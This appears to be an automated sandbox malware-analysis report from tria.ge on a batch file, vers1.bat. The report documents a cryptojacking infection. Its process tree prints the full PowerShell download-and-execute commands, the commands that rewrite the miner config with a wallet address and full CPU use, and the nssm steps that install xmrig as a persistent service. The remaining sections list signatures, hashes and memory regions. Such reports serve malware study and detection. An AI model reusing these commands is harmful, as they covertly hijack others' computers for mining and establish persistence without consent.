Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    1199s
  • max time network
    1168s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240611-en
  • resource tags

    arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    25/06/2024, 16:25

General

  • Target

    vers1.bat

  • Size

    393B

  • MD5

    ece9925dc634f1cc20e3fd7ff7a144bd

  • SHA1

    8816112e72b7b64a668bf7214999d855a7e05bde

  • SHA256

    a84009aa12f35d93284297647c2714df7f5b0a04d2e0732c689740920ea1421f

  • SHA512

    bf80fdf5fa8c00a0ddb773bed073d33b67bf6189b87b803f6fea7071e49dfdeb86cf2142175d9287fbc7bcfd639c42d848e9331f8bc7e68dacaaa33901432243

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

  • XMRig Miner payload 54 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Blocklisted process makes network request 4 IoCs
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 9 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

    Using powershell.exe command.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\vers1.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4496
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4168
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB9BB.tmp.bat" 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1532
        • C:\Windows\system32\net.exe
          net session
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4540
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 session
            5⤵
              PID:2372
          • C:\Windows\system32\where.exe
            where powershell
            4⤵
              PID:392
            • C:\Windows\system32\where.exe
              where find
              4⤵
                PID:2704
              • C:\Windows\system32\where.exe
                where findstr
                4⤵
                  PID:244
                • C:\Windows\system32\where.exe
                  where tasklist
                  4⤵
                    PID:412
                  • C:\Windows\system32\where.exe
                    where sc
                    4⤵
                      PID:5072
                    • C:\Windows\system32\sc.exe
                      sc stop moneroocean_miner
                      4⤵
                      • Launches sc.exe
                      PID:4088
                    • C:\Windows\system32\sc.exe
                      sc delete moneroocean_miner
                      4⤵
                      • Launches sc.exe
                      PID:4024
                    • C:\Windows\system32\taskkill.exe
                      taskkill /f /t /im xmrig.exe
                      4⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4904
                    • C:\Windows\system32\timeout.exe
                      timeout 5
                      4⤵
                      • Delays execution with timeout.exe
                      PID:1556
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
                      4⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:5068
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
                      4⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4548
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                      4⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2600
                    • C:\Users\Admin\moneroocean\xmrig.exe
                      "C:\Users\Admin\moneroocean\xmrig.exe" --help
                      4⤵
                      • Executes dropped EXE
                      PID:2616
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4628
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
                        5⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:2908
                        • C:\Windows\system32\HOSTNAME.EXE
                          "C:\Windows\system32\HOSTNAME.EXE"
                          6⤵
                            PID:1432
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10001\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4452
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1716
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Niojevyy\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1252
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1988
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4812
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4064
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
                        4⤵
                        • Blocklisted process makes network request
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2728
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2600
                      • C:\Windows\system32\sc.exe
                        sc stop moneroocean_miner
                        4⤵
                        • Launches sc.exe
                        PID:3996
                      • C:\Windows\system32\sc.exe
                        sc delete moneroocean_miner
                        4⤵
                        • Launches sc.exe
                        PID:2840
                      • C:\Users\Admin\moneroocean\nssm.exe
                        "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
                        4⤵
                        • Executes dropped EXE
                        PID:772
                      • C:\Users\Admin\moneroocean\nssm.exe
                        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
                        4⤵
                        • Executes dropped EXE
                        PID:3180
                      • C:\Users\Admin\moneroocean\nssm.exe
                        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
                        4⤵
                        • Executes dropped EXE
                        PID:4332
                      • C:\Users\Admin\moneroocean\nssm.exe
                        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
                        4⤵
                        • Executes dropped EXE
                        PID:2364
                      • C:\Users\Admin\moneroocean\nssm.exe
                        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
                        4⤵
                        • Executes dropped EXE
                        PID:4684
                      • C:\Users\Admin\moneroocean\nssm.exe
                        "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
                        4⤵
                        • Executes dropped EXE
                        PID:2004
                • C:\Windows\system32\taskmgr.exe
                  "C:\Windows\system32\taskmgr.exe" /0
                  1⤵
                  • Checks SCSI registry key(s)
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: GetForegroundWindowSpam
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:124
                • C:\Users\Admin\moneroocean\nssm.exe
                  C:\Users\Admin\moneroocean\nssm.exe
                  1⤵
                  • Executes dropped EXE
                  PID:2384
                  • C:\Users\Admin\moneroocean\xmrig.exe
                    "C:\Users\Admin\moneroocean\xmrig.exe"
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    PID:2972

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                  Filesize

                  2KB

                  MD5

                  5f4c933102a824f41e258078e34165a7

                  SHA1

                  d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

                  SHA256

                  d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

                  SHA512

                  a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  1KB

                  MD5

                  71de3d4e6a902c41e5d87b031a5a1910

                  SHA1

                  38da8e3af858eb6ad51af0aca573ed73c244cb21

                  SHA256

                  19c786a0d1be5f808940dfb0bfcdf3e78a1e4881cb326fabe044b9c7c2970466

                  SHA512

                  c3811686eead6874ad81483349e693e1ba89ef4c38d001cfdc5e49c5085d13649940a623a2e3cfd12d3ff887e6d12c11b3a832b09e00577d623cf4d7c03f7554

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  1KB

                  MD5

                  f35ff7b133da0a47bd9b410ea8b7884e

                  SHA1

                  549e9f82b341334b12e00da864739382de5f845a

                  SHA256

                  7212390e5727ce647c1b123b31df15398cf973e35ea1e3cee92ce2b5ee3d1602

                  SHA512

                  a6909feea75a3e69b714fd3e336395cd2985164a2812babc45a90d482eca26eca663e7b3da5afcf03a90ff54df5402dc1d392d3c5a41f270e59584fe96bd42f1

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  1KB

                  MD5

                  b0c2243b1e96caf557c196512cbe6788

                  SHA1

                  09fa057e5b03a6a54ecfe54467bbf9e7b059ff8b

                  SHA256

                  253e87a3b127d83ac56aa2fd3f15c82559715c817227312ac3ec0cd27f6ad84f

                  SHA512

                  07af9f32bb45fdcf744c1637a06e608e30cec6a0eaed5db02cb4bcd905c4ac55e13ef2f2b796c00e02974c99efd8612f2ece427676dcd9ad320d69dcbf404036

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  1KB

                  MD5

                  950ff664994cadcbeb894a9843e56ccb

                  SHA1

                  c2e4380567b95ef9d4994b79b08fa79a8085311e

                  SHA256

                  6dd5fe529af57ff4dcada6017ae35c40828c7cb964395dbc49da19dd48a0912a

                  SHA512

                  1967d8b47b389e91707d419495c614a2fdf276d93ea93cb5f05cb12d7c90ec4125c1f027d5abaa9df9331869ff7ff16fc9b836f071d6a299d405c9ab8a19b202

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  1KB

                  MD5

                  16d0bd640ab6a022a57f48e0c7ef5e16

                  SHA1

                  71770e9e1468ddbc328c348464e6ce3d729d9e9a

                  SHA256

                  176145ec96182f124b797ea12db3419427ec2fb07b9210b1ec83750fd86eddd5

                  SHA512

                  36d1558b6ba6cbd7a47f0bd9c5fc3daff14fe8e32c74b4eca4a327fc14f5bee9045231273ef760bbdd06f3259900d75a35a59826955702c7f252155eb4a735d5

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  1KB

                  MD5

                  4261ffdf62571a5786f7dd549efb9d80

                  SHA1

                  4aaf955269902e0060b3f0111173278ac383ed66

                  SHA256

                  d503cc03a4f2a2fe4be5e1b3695d921eb1bd858b32a1b4798cc15a1c2f2c447e

                  SHA512

                  10e2b720ae47a24a9645b7ac697b4dd5708bd37ce6fddc4147d167c76a9225e87cb33a87796e23eda3093b03dea6becd2a1398fc1c043c140fece0e7c1e73094

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  1KB

                  MD5

                  ba9f1c82fc41d29d27459d39a565c300

                  SHA1

                  12b556b534bcf476548f28699e499845e1c33536

                  SHA256

                  01330f29f57e1e63911b32ce9d101867bd4655f32a01d9eabf2ef6a28110612b

                  SHA512

                  6ab0a877062a056d7bdf252b2a9fbe8e03f8015bcaed72ad159e621b1c2fb79f444a2d7f5170e7309eb9d589707fcbd3e540be8f148beebd7f0e82209422a8d8

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  1KB

                  MD5

                  12ff85d31d9e76455b77e6658cb06bf0

                  SHA1

                  45788e71d4a7fe9fd70b2c0e9494174b01f385eb

                  SHA256

                  1c60ff7821e36304d7b4bcdd351a10da3685e9376775d8599f6d6103b688a056

                  SHA512

                  fcc4084ab70e49821a3095eeac1ef85cf02c73fdb787047f9f6b345132f069c566581921fac98fab5ddec1a550c266304cce186e1d46957946b6f66dba764d2f

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  1KB

                  MD5

                  969a07b130e6a24f99837abfaae8e214

                  SHA1

                  e866d389bcf06f56d2effdcea067c8b9c023ccc1

                  SHA256

                  6b336495061db3fe203263fb1a96b43f87a4aa1d494e7337e4e552218152203a

                  SHA512

                  e799b27ad1a5ba0cfa6be8a190f5b85ed1e19850289adb653ae3ef6524790fb7e0f5c99470043481702bd81715b97aed5daa3b3538dcb008c3fbe7000a35748e

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  1KB

                  MD5

                  81d4b189141a7c9c4e49c56d070aa960

                  SHA1

                  22fe2a1183079d954a5366f3b3a38e55d4b5bc6b

                  SHA256

                  076f0113da0dd75067e83a47b6b8b4ac372ce9442198a90e49a68e5c06737119

                  SHA512

                  bd05b846cb6a1f33ad740076566d9d28f4b64b048e70bdce5e853bb51e4494f4b081bbc61ef8d4e1cddacde4ce0408bd9c272e167ca105349d85206b42c087b3

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  64B

                  MD5

                  8a424e81b5a6078deff05e153c04a0ee

                  SHA1

                  bf209de0dbc1dbe7c5b5b511bd34bf447a3c049b

                  SHA256

                  79ce6d6caea4a9eabf8fdbb2a1c58d43fb5a3c500c2dec3fce87c160d2c6bda3

                  SHA512

                  aa01195e5c1d641304b08fed4a3bffc916972aa0bc20e928204cef1783f38922a03b761cf2010ccbace1ea0d2f18cda4eaeee4d8969f32fbae5f580e4e38522d

                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p1fqpdhs.mfh.ps1

                  Filesize

                  60B

                  MD5

                  d17fe0a3f47be24a6453e9ef58c94641

                  SHA1

                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                  SHA256

                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                  SHA512

                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                • C:\Users\Admin\AppData\Local\Temp\tmpB9BB.tmp.bat

                  Filesize

                  14KB

                  MD5

                  012a668bd1043d6b0a4bcd03d02ded41

                  SHA1

                  8595831d19a06d5ad38cb38b793eb1bdcc16b816

                  SHA256

                  57375e5d331ed567ca2da98b126ac585ff7829d15c31ad98eb452339e3ba1d05

                  SHA512

                  e43947f10872db119daa4f28c70046941602831a8e8a871ccad45f8712a972d76b31a05282de7f4bc99d2e23fe40ef9dceaef3ea84b7c6532b85fee920269792

                • C:\Users\Admin\moneroocean\config.json

                  Filesize

                  2KB

                  MD5

                  725d38d9eeadc9c2691063936b01f9ec

                  SHA1

                  153fd5bd55cfd845516562291a7ab867d68145b5

                  SHA256

                  0df3cdd812a582b5ddf5c8019fe7aecf03edb5760f4cf2d0c81ba73590a2ec43

                  SHA512

                  fe2758ddaa974696c733367d479dc54695ee1f177275f3b26d575b3c27b8c968b6bab0ce1e5b715e6513d1f39d880462b3d8cc542507f2eeae531a9a6d337658

                • C:\Users\Admin\moneroocean\config.json

                  Filesize

                  2KB

                  MD5

                  64cafb884608c751a2bccaca7c582e0f

                  SHA1

                  924f71ecb4903ab63a13a125e62fd6e5f5d20cb2

                  SHA256

                  3250e852f2fb3e61bd0642d92f1decac666777da7c4d59d6270ee49fc856151b

                  SHA512

                  ddd68d3d13bd65f926f6be67ac891c143d6e282ee955871382452f2627ca42ed54e7363d83651b904cdf8054bc1d12a02becd44ac1b5cdc98ac42fc7ebfe97a0

                • C:\Users\Admin\moneroocean\config.json

                  Filesize

                  2KB

                  MD5

                  2a6a3fe33c1b637df51f15b0ca3bbba3

                  SHA1

                  beac8a47a2afba55c6d5b355b15b934257fdca92

                  SHA256

                  675385e136bbe18f7b6fa6c6b0a6a278d081e83b2e5cbd8e6a79cbd85a434ad5

                  SHA512

                  daa36dab915f138583d8ce68c7f9f6427f0ff720083154766e49829af47039233043977269f3a3861abfbbbe75ff404b8fa463a16fcdec337b0d4fd53d50bc1c

                • C:\Users\Admin\moneroocean\config.json

                  Filesize

                  2KB

                  MD5

                  028e56b4f3a2c9e1044f2910077ad97c

                  SHA1

                  4036f79f56cc17b8f909c59d756275c3939d6dc9

                  SHA256

                  6c73eb112b0fcbd0aade8b67556064cc31d94fa269aa81d327b168580310de57

                  SHA512

                  19c742a2fc7fc4ec561c423bd0cfd7060b1689a27cd1d3879a503238bff15573c1136417844a458dd2c5bd07d9f30348fae2b520f1a3726d7a1b2cc3513bdba2

                • C:\Users\Admin\moneroocean\config.json

                  Filesize

                  2KB

                  MD5

                  34a986684d6dc38f0167ae4b48276747

                  SHA1

                  47f47a9a9ed3f24be09f43179d97e7fbb7bd204a

                  SHA256

                  785dd864936ed144e1d721ea11ceea271495387ffd1b235b16c5d8cb3612b879

                  SHA512

                  f1b5b291b9e9d38225b7bb6b357b15f78526dc76a3dd661b130a113939a9b72ce81efb3557006b1bca209150e7e971d73e7b5a885ec020c90dd6dcafca96a494

                • C:\Users\Admin\moneroocean\config.json

                  Filesize

                  2KB

                  MD5

                  d4f8a13f8c90e2b3b2e7d30a553df39c

                  SHA1

                  5c5303ef682ffcd31e57d1abd900ba5b637d51e4

                  SHA256

                  f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a

                  SHA512

                  68b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd

                • C:\Users\Admin\moneroocean\config.json

                  Filesize

                  2KB

                  MD5

                  c9ef9c214996db3d88f571226910c5d5

                  SHA1

                  420ba30247b1e09f706557a7704a1ebee5d3165c

                  SHA256

                  fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1

                  SHA512

                  de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d

                • C:\Users\Admin\moneroocean\nssm.exe

                  Filesize

                  360KB

                  MD5

                  1136efb1a46d1f2d508162387f30dc4d

                  SHA1

                  f280858dcfefabc1a9a006a57f6b266a5d1fde8e

                  SHA256

                  eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

                  SHA512

                  43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

                • C:\Users\Admin\moneroocean\xmrig.exe

                  Filesize

                  9.0MB

                  MD5

                  9ee2c39700819e5daab85785cac24ae1

                  SHA1

                  9b5156697983b2bdbc4fff0607fadbfda30c9b3b

                  SHA256

                  e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3

                  SHA512

                  47d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649

                • C:\Users\Admin\nssm.zip

                  Filesize

                  135KB

                  MD5

                  7ad31e7d91cc3e805dbc8f0615f713c1

                  SHA1

                  9f3801749a0a68ca733f5250a994dea23271d5c3

                  SHA256

                  5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

                  SHA512

                  d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

                • C:\Users\Admin\xmrig.zip

                  Filesize

                  3.5MB

                  MD5

                  640be21102a295874403dc35b85d09eb

                  SHA1

                  e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4

                  SHA256

                  ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b

                  SHA512

                  ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e

                • memory/124-36-0x0000029ACC870000-0x0000029ACC871000-memory.dmp

                  Filesize

                  4KB

                • memory/124-32-0x0000029ACC870000-0x0000029ACC871000-memory.dmp

                  Filesize

                  4KB

                • memory/124-33-0x0000029ACC870000-0x0000029ACC871000-memory.dmp

                  Filesize

                  4KB

                • memory/124-34-0x0000029ACC870000-0x0000029ACC871000-memory.dmp

                  Filesize

                  4KB

                • memory/124-35-0x0000029ACC870000-0x0000029ACC871000-memory.dmp

                  Filesize

                  4KB

                • memory/124-37-0x0000029ACC870000-0x0000029ACC871000-memory.dmp

                  Filesize

                  4KB

                • memory/124-31-0x0000029ACC870000-0x0000029ACC871000-memory.dmp

                  Filesize

                  4KB

                • memory/124-25-0x0000029ACC870000-0x0000029ACC871000-memory.dmp

                  Filesize

                  4KB

                • memory/124-26-0x0000029ACC870000-0x0000029ACC871000-memory.dmp

                  Filesize

                  4KB

                • memory/124-27-0x0000029ACC870000-0x0000029ACC871000-memory.dmp

                  Filesize

                  4KB

                • memory/2616-78-0x0000000001290000-0x00000000012B0000-memory.dmp

                  Filesize

                  128KB

                • memory/2616-79-0x0000000000400000-0x000000000102B000-memory.dmp

                  Filesize

                  12.2MB

                • memory/2972-205-0x0000000000400000-0x000000000102B000-memory.dmp

                  Filesize

                  12.2MB

                • memory/2972-224-0x0000000000400000-0x000000000102B000-memory.dmp

                  Filesize

                  12.2MB

                • memory/2972-254-0x0000000000400000-0x000000000102B000-memory.dmp

                  Filesize

                  12.2MB

                • memory/2972-253-0x0000000000400000-0x000000000102B000-memory.dmp

                  Filesize

                  12.2MB

                • memory/2972-252-0x0000000000400000-0x000000000102B000-memory.dmp

                  Filesize

                  12.2MB

                • memory/2972-251-0x0000000000400000-0x000000000102B000-memory.dmp

                  Filesize

                  12.2MB

                • memory/2972-250-0x0000000000400000-0x000000000102B000-memory.dmp

                  Filesize

                  12.2MB

                • memory/2972-249-0x0000000000400000-0x000000000102B000-memory.dmp

                  Filesize

                  12.2MB

                • memory/2972-202-0x0000000000400000-0x000000000102B000-memory.dmp

                  Filesize

                  12.2MB

                • memory/2972-203-0x0000000000400000-0x000000000102B000-memory.dmp

                  Filesize

                  12.2MB

                • memory/2972-204-0x0000000000400000-0x000000000102B000-memory.dmp

                  Filesize

                  12.2MB

                • memory/2972-248-0x0000000000400000-0x000000000102B000-memory.dmp

                  Filesize

                  12.2MB

                • memory/2972-207-0x0000000000400000-0x000000000102B000-memory.dmp

                  Filesize

                  12.2MB

                • memory/2972-208-0x0000000000400000-0x000000000102B000-memory.dmp

                  Filesize

                  12.2MB

                • memory/2972-209-0x0000000000400000-0x000000000102B000-memory.dmp

                  Filesize

                  12.2MB

                • memory/2972-210-0x0000000000400000-0x000000000102B000-memory.dmp

                  Filesize

                  12.2MB

                • memory/2972-211-0x0000000000400000-0x000000000102B000-memory.dmp

                  Filesize

                  12.2MB

                • memory/2972-212-0x0000000000400000-0x000000000102B000-memory.dmp

                  Filesize

                  12.2MB

                • memory/2972-213-0x0000000000400000-0x000000000102B000-memory.dmp

                  Filesize

                  12.2MB

                • memory/2972-214-0x0000000000400000-0x000000000102B000-memory.dmp

                  Filesize

                  12.2MB

                • memory/2972-215-0x0000000000400000-0x000000000102B000-memory.dmp

                  Filesize

                  12.2MB

